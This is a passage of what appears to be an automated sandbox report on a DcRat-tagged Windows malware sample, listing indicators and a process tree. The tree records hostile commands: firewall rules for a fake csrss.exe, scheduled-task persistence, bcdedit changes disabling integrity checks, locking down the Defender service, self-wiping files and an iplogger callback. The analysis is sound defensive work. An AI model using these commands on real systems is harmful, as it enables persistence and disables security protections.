88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	patch.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
616	IJmiVlFOgSUbo93PGOTzINSi.exe
616	IJmiVlFOgSUbo93PGOTzINSi.exe
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1656	taskeng.exe
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
2312	ZtDMcUM8mSB7FYFigOIx89oA.exe
3008	vdkHIxEPSE0HzSAz2UJDgMhL.exe
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
2080	kRthp4WSd36dGiVtyCKouTRt.exe
2080	kRthp4WSd36dGiVtyCKouTRt.exe
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
3008	vdkHIxEPSE0HzSAz2UJDgMhL.exe
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1364	Explorer.EXE

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
468	Process not Found
468	Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
616	IJmiVlFOgSUbo93PGOTzINSi.exe

Suspicious use of AdjustPrivilegeToken 54 IoCs

description	pid	Process
Token: SeDebugPrivilege	1576	c8123964a14a24724ce73744c33bfac9446e53ca0675f37c68510284f8c9ee32.exe
Token: SeDebugPrivilege	2476	InstallUtil.exe
Token: SeDebugPrivilege	2908	untilmathematics.exe
Token: SeDebugPrivilege	2452	S43ND2aHtJ5KT8vGcjscMGOL.exe
Token: SeShutdownPrivilege	1364	Explorer.EXE
Token: SeShutdownPrivilege	1364	Explorer.EXE
Token: SeDebugPrivilege	2312	ZtDMcUM8mSB7FYFigOIx89oA.exe
Token: SeImpersonatePrivilege	2312	ZtDMcUM8mSB7FYFigOIx89oA.exe
Token: SeDebugPrivilege	3008	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Token: SeImpersonatePrivilege	3008	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Token: SeShutdownPrivilege	1364	Explorer.EXE
Token: SeDebugPrivilege	3008	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Token: SeImpersonatePrivilege	3008	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Token: SeShutdownPrivilege	1364	Explorer.EXE
Token: SeShutdownPrivilege	1364	Explorer.EXE
Token: SeDebugPrivilege	2364	powershell.exe
Token: SeShutdownPrivilege	1364	Explorer.EXE
Token: SeShutdownPrivilege	1364	Explorer.EXE
Token: SeShutdownPrivilege	1364	Explorer.EXE
Token: SeShutdownPrivilege	2732	powercfg.exe
Token: SeShutdownPrivilege	1704	powercfg.exe
Token: SeShutdownPrivilege	1160	powercfg.exe
Token: SeShutdownPrivilege	1364	Explorer.EXE
Token: SeShutdownPrivilege	2852	powercfg.exe
Token: SeShutdownPrivilege	1364	Explorer.EXE
Token: SeShutdownPrivilege	1364	Explorer.EXE
Token: SeShutdownPrivilege	1364	Explorer.EXE
Token: SeSystemEnvironmentPrivilege	632	csrss.exe
Token: SeDebugPrivilege	2856	powershell.EXE
Token: SeDebugPrivilege	312	untilmathematiics.exe
Token: SeShutdownPrivilege	1364	Explorer.EXE
Token: SeShutdownPrivilege	1364	Explorer.EXE
Token: SeShutdownPrivilege	1364	Explorer.EXE
Token: SeShutdownPrivilege	1364	Explorer.EXE
Token: SeShutdownPrivilege	1364	Explorer.EXE
Token: SeShutdownPrivilege	1364	Explorer.EXE
Token: SeShutdownPrivilege	1364	Explorer.EXE
Token: SeDebugPrivilege	2960	powershell.exe
Token: SeShutdownPrivilege	1004	powercfg.exe
Token: SeShutdownPrivilege	1072	powercfg.exe
Token: SeShutdownPrivilege	1824	powercfg.exe
Token: SeShutdownPrivilege	768	powercfg.exe
Token: SeDebugPrivilege	320	updater.exe
Token: SeLockMemoryPrivilege	1620	explorer.exe
Token: SeSecurityPrivilege	1568	sc.exe
Token: SeSecurityPrivilege	1568	sc.exe
Token: SeShutdownPrivilege	1364	Explorer.EXE
Token: SeShutdownPrivilege	1364	Explorer.EXE
Token: SeShutdownPrivilege	1364	Explorer.EXE
Token: SeShutdownPrivilege	1364	Explorer.EXE
Token: SeShutdownPrivilege	1364	Explorer.EXE
Token: SeShutdownPrivilege	1364	Explorer.EXE
Token: SeDebugPrivilege	2076	powershell.EXE
Token: SeDebugPrivilege	2468	powershell.EXE

Suspicious use of FindShellTrayWindow 13 IoCs

pid	Process
2284	iexplore.exe
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE
1364	Explorer.EXE

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
1364	Explorer.EXE
1364	Explorer.EXE

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2284	iexplore.exe
2284	iexplore.exe
268	IEXPLORE.EXE
268	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1576 wrote to memory of 2852	1576	c8123964a14a24724ce73744c33bfac9446e53ca0675f37c68510284f8c9ee32.exe	28
PID 1576 wrote to memory of 2852	1576	c8123964a14a24724ce73744c33bfac9446e53ca0675f37c68510284f8c9ee32.exe	28
PID 1576 wrote to memory of 2852	1576	c8123964a14a24724ce73744c33bfac9446e53ca0675f37c68510284f8c9ee32.exe	28
PID 1576 wrote to memory of 2852	1576	c8123964a14a24724ce73744c33bfac9446e53ca0675f37c68510284f8c9ee32.exe	28
PID 1576 wrote to memory of 2852	1576	c8123964a14a24724ce73744c33bfac9446e53ca0675f37c68510284f8c9ee32.exe	28
PID 1576 wrote to memory of 2852	1576	c8123964a14a24724ce73744c33bfac9446e53ca0675f37c68510284f8c9ee32.exe	28
PID 1576 wrote to memory of 2852	1576	c8123964a14a24724ce73744c33bfac9446e53ca0675f37c68510284f8c9ee32.exe	28
PID 1576 wrote to memory of 2476	1576	c8123964a14a24724ce73744c33bfac9446e53ca0675f37c68510284f8c9ee32.exe	29
PID 1576 wrote to memory of 2476	1576	c8123964a14a24724ce73744c33bfac9446e53ca0675f37c68510284f8c9ee32.exe	29
PID 1576 wrote to memory of 2476	1576	c8123964a14a24724ce73744c33bfac9446e53ca0675f37c68510284f8c9ee32.exe	29
PID 1576 wrote to memory of 2476	1576	c8123964a14a24724ce73744c33bfac9446e53ca0675f37c68510284f8c9ee32.exe	29
PID 1576 wrote to memory of 2476	1576	c8123964a14a24724ce73744c33bfac9446e53ca0675f37c68510284f8c9ee32.exe	29
PID 1576 wrote to memory of 2476	1576	c8123964a14a24724ce73744c33bfac9446e53ca0675f37c68510284f8c9ee32.exe	29
PID 1576 wrote to memory of 2476	1576	c8123964a14a24724ce73744c33bfac9446e53ca0675f37c68510284f8c9ee32.exe	29
PID 1576 wrote to memory of 2476	1576	c8123964a14a24724ce73744c33bfac9446e53ca0675f37c68510284f8c9ee32.exe	29
PID 1576 wrote to memory of 2476	1576	c8123964a14a24724ce73744c33bfac9446e53ca0675f37c68510284f8c9ee32.exe	29
PID 1576 wrote to memory of 2476	1576	c8123964a14a24724ce73744c33bfac9446e53ca0675f37c68510284f8c9ee32.exe	29
PID 1576 wrote to memory of 2476	1576	c8123964a14a24724ce73744c33bfac9446e53ca0675f37c68510284f8c9ee32.exe	29
PID 1576 wrote to memory of 2476	1576	c8123964a14a24724ce73744c33bfac9446e53ca0675f37c68510284f8c9ee32.exe	29
PID 2476 wrote to memory of 1380	2476	InstallUtil.exe	30
PID 2476 wrote to memory of 1380	2476	InstallUtil.exe	30
PID 2476 wrote to memory of 1380	2476	InstallUtil.exe	30
PID 2476 wrote to memory of 1380	2476	InstallUtil.exe	30
PID 2476 wrote to memory of 2016	2476	InstallUtil.exe	33
PID 2476 wrote to memory of 2016	2476	InstallUtil.exe	33
PID 2476 wrote to memory of 2016	2476	InstallUtil.exe	33
PID 2476 wrote to memory of 2016	2476	InstallUtil.exe	33
PID 2476 wrote to memory of 3008	2476	InstallUtil.exe	31
PID 2476 wrote to memory of 3008	2476	InstallUtil.exe	31
PID 2476 wrote to memory of 3008	2476	InstallUtil.exe	31
PID 2476 wrote to memory of 3008	2476	InstallUtil.exe	31
PID 2476 wrote to memory of 2312	2476	InstallUtil.exe	32
PID 2476 wrote to memory of 2312	2476	InstallUtil.exe	32
PID 2476 wrote to memory of 2312	2476	InstallUtil.exe	32
PID 2476 wrote to memory of 2312	2476	InstallUtil.exe	32
PID 2476 wrote to memory of 2080	2476	InstallUtil.exe	34
PID 2476 wrote to memory of 2080	2476	InstallUtil.exe	34
PID 2476 wrote to memory of 2080	2476	InstallUtil.exe	34
PID 2476 wrote to memory of 2080	2476	InstallUtil.exe	34
PID 2476 wrote to memory of 2452	2476	InstallUtil.exe	35
PID 2476 wrote to memory of 2452	2476	InstallUtil.exe	35
PID 2476 wrote to memory of 2452	2476	InstallUtil.exe	35
PID 2476 wrote to memory of 2452	2476	InstallUtil.exe	35
PID 2476 wrote to memory of 1664	2476	InstallUtil.exe	37
PID 2476 wrote to memory of 1664	2476	InstallUtil.exe	37
PID 2476 wrote to memory of 1664	2476	InstallUtil.exe	37
PID 2476 wrote to memory of 1664	2476	InstallUtil.exe	37
PID 2476 wrote to memory of 1824	2476	InstallUtil.exe	36
PID 2476 wrote to memory of 1824	2476	InstallUtil.exe	36
PID 2476 wrote to memory of 1824	2476	InstallUtil.exe	36
PID 2476 wrote to memory of 1824	2476	InstallUtil.exe	36
PID 2476 wrote to memory of 1824	2476	InstallUtil.exe	36
PID 2476 wrote to memory of 1824	2476	InstallUtil.exe	36
PID 2476 wrote to memory of 1824	2476	InstallUtil.exe	36
PID 1664 wrote to memory of 616	1664	IJmiVlFOgSUbo93PGOTzINSi.exe	41
PID 1664 wrote to memory of 616	1664	IJmiVlFOgSUbo93PGOTzINSi.exe	41
PID 1664 wrote to memory of 616	1664	IJmiVlFOgSUbo93PGOTzINSi.exe	41
PID 1664 wrote to memory of 616	1664	IJmiVlFOgSUbo93PGOTzINSi.exe	41
PID 2476 wrote to memory of 1656	2476	InstallUtil.exe	79
PID 2476 wrote to memory of 1656	2476	InstallUtil.exe	79
PID 2476 wrote to memory of 1656	2476	InstallUtil.exe	79
PID 2476 wrote to memory of 1656	2476	InstallUtil.exe	79
PID 1664 wrote to memory of 616	1664	IJmiVlFOgSUbo93PGOTzINSi.exe	41
PID 1664 wrote to memory of 616	1664	IJmiVlFOgSUbo93PGOTzINSi.exe	41

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1364
- C:\Users\Admin\AppData\Local\Temp\c8123964a14a24724ce73744c33bfac9446e53ca0675f37c68510284f8c9ee32.exe
  "C:\Users\Admin\AppData\Local\Temp\c8123964a14a24724ce73744c33bfac9446e53ca0675f37c68510284f8c9ee32.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1576
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    3⤵
    PID:2852
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    3⤵
    - DcRat
    - Drops startup file
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2476
  - - C:\Users\Admin\Pictures\uUeFYzMg2TIaunkDHxsaP1oH.exe
      "C:\Users\Admin\Pictures\uUeFYzMg2TIaunkDHxsaP1oH.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Adds Run key to start application
      PID:1380
    - - C:\Windows\system32\cmd.exe
        
        cmd /c lophime.bat
        5⤵
        
        PID:2480
      - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.com/2TPq55
        6⤵
        Modifies Internet Explorer settings
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:2284
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2284 CREDAT:275457 /prefetch:2
        7⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:268
    - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1untilmathematicsproie1.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1untilmathematicsproie1.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2236
      - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1untilmathematicspro.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1untilmathematicspro.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2548
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\untilmathematics.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\untilmathematics.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:2908
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\untilmathematics.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\untilmathematics.exe
        8⤵
        Executes dropped EXE
        
        PID:3060
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c timeout /nobreak /t 3 & fsutil file setZeroData offset=0 length=5631 "C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\untilmathematics.exe" & erase "C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\untilmathematics.exe" & exit
        9⤵
        
        PID:1928
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /nobreak /t 3
        10⤵
        Delays execution with timeout.exe
        
        PID:1732
        
        C:\Windows\SysWOW64\fsutil.exe
        
        fsutil file setZeroData offset=0 length=5631 "C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\untilmathematics.exe"
        10⤵
        
        PID:2016
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\untilmathematiics.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\untilmathematiics.exe
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:312
  - - C:\Users\Admin\Pictures\vdkHIxEPSE0HzSAz2UJDgMhL.exe
      "C:\Users\Admin\Pictures\vdkHIxEPSE0HzSAz2UJDgMhL.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3008
    - - C:\Users\Admin\Pictures\vdkHIxEPSE0HzSAz2UJDgMhL.exe
        
        "C:\Users\Admin\Pictures\vdkHIxEPSE0HzSAz2UJDgMhL.exe"
        5⤵
        DcRat
        Windows security bypass
        Executes dropped EXE
        Windows security modification
        Adds Run key to start application
        Checks for VirtualBox DLLs, possible anti-VM trick
        Drops file in Windows directory
        Modifies data under HKEY_USERS
        
        PID:2240
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        6⤵
        
        PID:2024
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        Modifies data under HKEY_USERS
        
        PID:1628
  - - C:\Users\Admin\Pictures\ZtDMcUM8mSB7FYFigOIx89oA.exe
      "C:\Users\Admin\Pictures\ZtDMcUM8mSB7FYFigOIx89oA.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2312
    - - C:\Users\Admin\Pictures\ZtDMcUM8mSB7FYFigOIx89oA.exe
        
        "C:\Users\Admin\Pictures\ZtDMcUM8mSB7FYFigOIx89oA.exe"
        5⤵
        DcRat
        Windows security bypass
        Executes dropped EXE
        Loads dropped DLL
        Windows security modification
        Adds Run key to start application
        Checks for VirtualBox DLLs, possible anti-VM trick
        Drops file in Windows directory
        Modifies data under HKEY_USERS
        
        PID:2648
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        6⤵
        
        PID:2244
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        Modifies data under HKEY_USERS
        
        PID:2448
      - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        6⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Manipulates WinMon driver.
        Manipulates WinMonFS driver.
        Drops file in Windows directory
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        
        PID:632
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        7⤵
        
        PID:904
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        7⤵
        DcRat
        Creates scheduled task(s)
        
        PID:1980
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        7⤵
        Executes dropped EXE
        
        PID:2636
        
        C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        
        "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies system certificate store
        
        PID:2228
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
        8⤵
        Modifies boot configuration data using bcdedit
        
        PID:2756
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
        8⤵
        Modifies boot configuration data using bcdedit
        
        PID:552
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
        8⤵
        Modifies boot configuration data using bcdedit
        
        PID:332
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
        8⤵
        Modifies boot configuration data using bcdedit
        
        PID:1944
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
        8⤵
        Modifies boot configuration data using bcdedit
        
        PID:1688
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
        8⤵
        Modifies boot configuration data using bcdedit
        
        PID:1552
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
        8⤵
        Modifies boot configuration data using bcdedit
        
        PID:992
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
        8⤵
        Modifies boot configuration data using bcdedit
        
        PID:3064
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
        8⤵
        Modifies boot configuration data using bcdedit
        
        PID:2732
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
        8⤵
        Modifies boot configuration data using bcdedit
        
        PID:2256
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
        8⤵
        Modifies boot configuration data using bcdedit
        
        PID:380
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -timeout 0
        8⤵
        Modifies boot configuration data using bcdedit
        
        PID:2624
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
        8⤵
        Modifies boot configuration data using bcdedit
        
        PID:488
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\Sysnative\bcdedit.exe /v
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2544
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        7⤵
        Executes dropped EXE
        
        PID:2016
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        7⤵
        DcRat
        Creates scheduled task(s)
        
        PID:1584
        
        C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        7⤵
        Executes dropped EXE
        
        PID:2508
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        8⤵
        
        PID:1196
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        9⤵
        Launches sc.exe
        Suspicious use of AdjustPrivilegeToken
        
        PID:1568
        
        C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
        7⤵
        Executes dropped EXE
        
        PID:3008
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /tn "csrss" /f
        8⤵
        
        PID:852
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /tn "ScheduledUpdate" /f
        8⤵
        
        PID:2152
  - - C:\Users\Admin\Pictures\S2oyyP5o6RkKAYlBole3sVtJ.exe
      "C:\Users\Admin\Pictures\S2oyyP5o6RkKAYlBole3sVtJ.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2016
    - - C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe"
        5⤵
        Executes dropped EXE
        
        PID:2528
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
        6⤵
        DcRat
        Creates scheduled task(s)
        
        PID:1572
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "Admin:N"&&CACLS "nhdues.exe" /P "Admin:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "Admin:N"&&CACLS "..\1ff8bec27e" /P "Admin:R" /E&&Exit
        6⤵
        
        PID:2204
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        7⤵
        
        PID:2672
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "nhdues.exe" /P "Admin:N"
        7⤵
        
        PID:2700
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "nhdues.exe" /P "Admin:R" /E
        7⤵
        
        PID:2732
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\1ff8bec27e" /P "Admin:N"
        7⤵
        
        PID:2964
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        7⤵
        
        PID:2552
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\1ff8bec27e" /P "Admin:R" /E
        7⤵
        
        PID:2536
